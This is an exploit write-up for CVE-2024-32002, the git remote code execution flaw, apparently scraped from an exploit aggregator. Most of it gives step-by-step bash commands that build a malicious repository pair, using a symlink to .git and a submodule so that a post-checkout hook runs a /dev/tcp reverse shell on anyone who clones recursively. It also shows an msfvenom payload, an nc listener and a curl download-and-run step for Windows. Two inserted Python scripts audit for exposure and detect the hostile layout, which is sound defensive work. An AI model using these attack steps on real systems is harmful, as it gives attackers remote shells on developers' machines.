## https://sploitus.com/exploit?id=D0336BF6-6AF7-5C0D-8762-125A36BDF34F
######################
GIT RCE CVE-2024-32002
######################
***********
Description
***********
| CVE-2024-32002
| https://www.tarlogic.com/blog/cve-2024-32002-vulnerability-git/
|
*******
Exploit
*******
| First you need to create the "calledrepo" and "commandrepo" repositories on the Git server.
| The victim will later clone calledrepo with "git clone --recursive calledrepo.git", which pulls in commandrepo as a submodule and executes the hook script.
| This bash reverse shell payload works on WINDOWS and LINUX.
|
| I'm using the git CLI in Docker because I don't want to get into trouble with my system git config, but it's optional.

.. code-block:: bash

   # Start a Debian docker instance
   docker run --rm -it debian
   # Install git
   apt update
   apt install -y git

| Configuring git

.. code-block:: bash

   # Identity for the commits made below
   git config --global user.email "whatever"
   git config --global user.name "whatever"
   # Allow local (file://) submodule URLs and symlink entries in the working tree
   git config --global protocol.file.allow always
   git config --global core.symlinks true
   # Branch name used by the repositories created below
   git config --global init.defaultBranch main

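Two of the settings above also decide whether the cloning side is exposed: ``core.symlinks`` has to be on for the ``a -> .git`` symlink to be created during checkout, and the client has to be a git release without the fix. The script below is an added example and not part of the original write-up; the fixed-version table is taken from the May 2024 upstream git security release (2.45.1 and the backports 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2 and 2.39.4), and deriving "case-insensitive filesystem" from the OS name is an assumption that holds for default Windows and macOS setups only.

```python
"""Audit a git client for the CVE-2024-32002 preconditions.

Added example, not part of the original write-up. Checks the machine that
would run ``git clone --recursive`` for the three things the exploit needs:
an unpatched git, ``core.symlinks`` enabled, and a case-insensitive
working tree (the last one is inferred from the OS name; assumption).
"""
import platform
import re
import subprocess

# (major, minor) -> first patch release of that series that contains the fix
# (from the upstream May 2024 security release).
FIXED_VERSIONS = {
    (2, 45): (2, 45, 1), (2, 44): (2, 44, 1), (2, 43): (2, 43, 4),
    (2, 42): (2, 42, 2), (2, 41): (2, 41, 1), (2, 40): (2, 40, 2),
    (2, 39): (2, 39, 4),
}


def parse_git_version(text):
    """Extract (major, minor, patch) from output such as 'git version 2.45.0.windows.1'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised git version string: {text!r}")
    return tuple(int(x) for x in m.groups())


def version_is_patched(version):
    """True if this git release includes the CVE-2024-32002 fix."""
    major, minor, _ = version
    if (major, minor) > (2, 45):
        return True          # every later series branched after the fix
    fixed = FIXED_VERSIONS.get((major, minor))
    if fixed is None:
        return False         # series older than 2.39 never received a backport
    return version >= fixed


def assess(version, core_symlinks, case_insensitive_fs):
    """Return (exposed, reasons); exposed only if all three preconditions hold."""
    reasons = []
    if not version_is_patched(version):
        reasons.append("git %d.%d.%d predates the fix" % version)
    if core_symlinks:
        reasons.append("core.symlinks=true lets the hostile symlink be checked out")
    if case_insensitive_fs:
        reasons.append("case-insensitive filesystem lets A/modules/x alias a/modules/x")
    return len(reasons) == 3, reasons


def git_output(*args):
    """Run a git command and return its stdout (empty string if the key is unset)."""
    return subprocess.run(["git", *args], capture_output=True, text=True).stdout.strip()


def audit_local_git():
    """Audit the git found on PATH; uses the platform defaults where a key is unset."""
    version = parse_git_version(git_output("--version"))
    raw = git_output("config", "--get", "core.symlinks")
    system = platform.system()
    is_windows = system == "Windows"
    # core.symlinks defaults to false on Windows and true elsewhere when unset.
    core_symlinks = raw.lower() in ("true", "yes", "on", "1") if raw else not is_windows
    # Assumption: Windows and macOS use their default case-insensitive filesystems.
    case_insensitive = is_windows or system == "Darwin"
    return assess(version, core_symlinks, case_insensitive)


if __name__ == "__main__":
    exposed, reasons = audit_local_git()
    print("EXPOSED to CVE-2024-32002" if exposed else "not exposed to CVE-2024-32002")
    for reason in reasons:
        print(" -", reason)
```

Run it on the workstation that will do the cloning; a verdict of "not exposed" with ``core.symlinks=true`` still listed means the version is the only thing protecting the machine, which is worth knowing before the next git downgrade.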
| Setting vars

.. code-block:: bash

   GIT_IP="10.129.19.99"
   GIT_USER="charles"
   GIT_PORT="3000"
   LHOST="10.10.14.113"
   LPORT="4444"

| Populating repos

.. code-block:: bash

   cd /tmp
   rm -rf calledrepo commandrepo
   # commandrepo carries the post-checkout hook that will run on the victim
   git clone "http://$GIT_IP:$GIT_PORT/$GIT_USER/commandrepo.git"
   cd commandrepo
   mkdir -p y/hooks
   cat <<EOF>y/hooks/post-checkout
   #!/bin/bash
   /bin/bash -c "bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1"
   EOF
   chmod +x y/hooks/post-checkout
   git add y/hooks/post-checkout
   git commit -m "post-checkout"
   git push
   cd ..
   # calledrepo embeds commandrepo as a submodule named x/y at path A/modules/x
   git clone "http://$GIT_IP:$GIT_PORT/$GIT_USER/calledrepo.git"
   cd calledrepo
   git submodule add --name x/y "http://$GIT_IP:$GIT_PORT/$GIT_USER/commandrepo.git" A/modules/x
   git commit -m "add-submodule"
   # Symlink "a" -> .git, so on a case-insensitive filesystem A/modules/x resolves to .git/modules/x
   printf ".git" > dotgit.txt
   git hash-object -w --stdin < dotgit.txt > dot-git.hash
   printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
   git update-index --index-info < index.info
   git commit -m "add-symlink"
   git push
   cd ..
   # Print the command to run on the victim
   echo "git clone --recursive http://$GIT_IP:$GIT_PORT/$GIT_USER/calledrepo.git"

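The sequence above produces a tree in which the symlink ``a`` points at ``.git`` and the submodule path ``A/modules/x`` differs from it only by case, so on a case-insensitive checkout the submodule's files, ``y/hooks/post-checkout`` included, are written under ``.git/modules/x/``, which is where git keeps the metadata and hooks of the submodule named ``x/y``. The script below is an added example (not the write-up's own code) for checking a repository for this layout before anyone runs a recursive clone: it reads ``git ls-tree -r HEAD`` and ``.gitmodules`` from a clone made with ``--no-checkout``, resolves every submodule path through the tree's symlinks with case-insensitive matching, and reports any path that lands inside ``.git/``. The sample tree, object ids and URL embedded at the bottom are constructed for the demonstration.

```python
"""Flag repositories laid out for CVE-2024-32002 before recursively cloning them.

Added example, not part of the original write-up. Works on the output of
``git ls-tree -r HEAD`` plus the contents of ``.gitmodules`` from a clone made
with ``--no-checkout`` (nothing from the tree touches the disk), and a callable
that returns a blob's content, which for a symlink entry is its target.
"""
import posixpath
import re
import subprocess

SYMLINK_MODE = "120000"   # tree entry mode of a symbolic link
GITLINK_MODE = "160000"   # tree entry mode of a submodule commit


def parse_ls_tree(text):
    """Parse 'mode type oid<TAB>path' lines into (mode, type, oid, path) tuples."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        meta, path = line.split("\t", 1)
        mode, otype, oid = meta.split()
        entries.append((mode, otype, oid, path))
    return entries


def parse_gitmodules(text):
    """Minimal .gitmodules parser: {submodule name: {key: value}}."""
    modules, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        header = re.match(r'\[submodule\s+"(.+)"\]$', line)
        if header:
            current = header.group(1)
            modules[current] = {}
        elif current is not None and "=" in line and not line.startswith("#"):
            key, value = line.split("=", 1)
            modules[current][key.strip()] = value.strip()
    return modules


def resolve_case_insensitive(path, symlinks):
    """Walk PATH one component at a time, following symlinks case-insensitively.

    SYMLINKS maps a lower-cased repo-relative path to the link's target, which
    mimics a checkout on Windows or default macOS where 'A' and 'a' collide.
    """
    resolved = ""
    for part in path.split("/"):
        candidate = posixpath.join(resolved, part) if resolved else part
        target = symlinks.get(candidate.lower())
        if target is None:
            resolved = candidate
        else:
            # A symlink target is relative to the directory containing the link.
            resolved = posixpath.normpath(
                posixpath.join(posixpath.dirname(candidate), target))
    return resolved


def find_submodules_inside_dotgit(ls_tree_text, read_blob, gitmodules_text):
    """Return one finding per submodule whose checkout path resolves into .git/."""
    entries = parse_ls_tree(ls_tree_text)
    symlinks = {path.lower(): read_blob(oid).strip()
                for mode, _, oid, path in entries if mode == SYMLINK_MODE}
    # Paths come from .gitmodules; gitlink entries cover a missing or partial file.
    paths = {cfg.get("path"): name
             for name, cfg in parse_gitmodules(gitmodules_text).items()}
    for mode, _, _, path in entries:
        if mode == GITLINK_MODE:
            paths.setdefault(path, "<unlisted in .gitmodules>")
    findings = []
    for path, name in paths.items():
        if not path:
            continue
        resolved = resolve_case_insensitive(path, symlinks)
        if resolved == ".git" or resolved.startswith(".git/"):
            findings.append({"submodule": name, "path": path, "resolves_to": resolved})
    return findings


def scan_repository(repo_dir):
    """Run the check against a local clone made with 'git clone --no-checkout'."""
    def git(*args):
        return subprocess.run(["git", "-C", repo_dir, *args],
                              capture_output=True, text=True, check=True).stdout
    try:
        gitmodules = git("show", "HEAD:.gitmodules")
    except subprocess.CalledProcessError:
        gitmodules = ""
    return find_submodules_inside_dotgit(
        git("ls-tree", "-r", "HEAD"), lambda oid: git("cat-file", "-p", oid), gitmodules)


# Constructed sample mirroring the write-up's layout: symlink 'a' -> .git and a
# submodule named x/y at A/modules/x. Object ids and the URL are placeholders.
SAMPLE_LS_TREE = (
    "100644 blob aaaaaaa1\t.gitmodules\n"
    "120000 blob aaaaaaa2\ta\n"
    "160000 commit aaaaaaa3\tA/modules/x\n"
)
SAMPLE_BLOBS = {"aaaaaaa2": ".git"}
SAMPLE_GITMODULES = (
    '[submodule "x/y"]\n'
    "\tpath = A/modules/x\n"
    "\turl = http://git.example.invalid/commandrepo.git\n"
)

if __name__ == "__main__":
    for f in find_submodules_inside_dotgit(SAMPLE_LS_TREE, SAMPLE_BLOBS.get, SAMPLE_GITMODULES):
        print(f"submodule {f['submodule']!r} at {f['path']} checks out into {f['resolves_to']}")
```

Point ``scan_repository()`` at a ``--no-checkout`` clone, or at a bare mirror, as a pre-clone gate in CI; the constructed sample is flagged as ``x/y`` resolving to ``.git/modules/x``, while a symlink that points anywhere outside ``.git`` produces no finding.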
|
*******
Windows
*******
| After exploitation on Windows you get a Git Bash shell that has some issues/restrictions:
|

.. code-block:: bash

   $ C:\windows\System32\whoami.exe /all
   bash: C:windowsSystem32whoami.exe: command not found

| If you want to escape from this environment, you can spawn a new reverse shell.
|

.. code-block:: bash

   # Attacker side
   msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o payload.exe
   sudo cp payload.exe /var/www/html
   sudo nc -nvlp 443 -s 10.10.14.113

.. code-block:: bash

   # Windows side (curl -o names the output file; -O would use the remote name)
   cd ~/
   curl -o payload.exe http://10.10.14.113/payload.exe
   ./payload.exe

|
| Don't forget that Git Bash's directories may still have PATH priority over the Windows commands in the new shell.
| You can run the Windows command by using its full path.
|

.. code-block:: bat

   C:\windows\System32\whoami.exe /all

|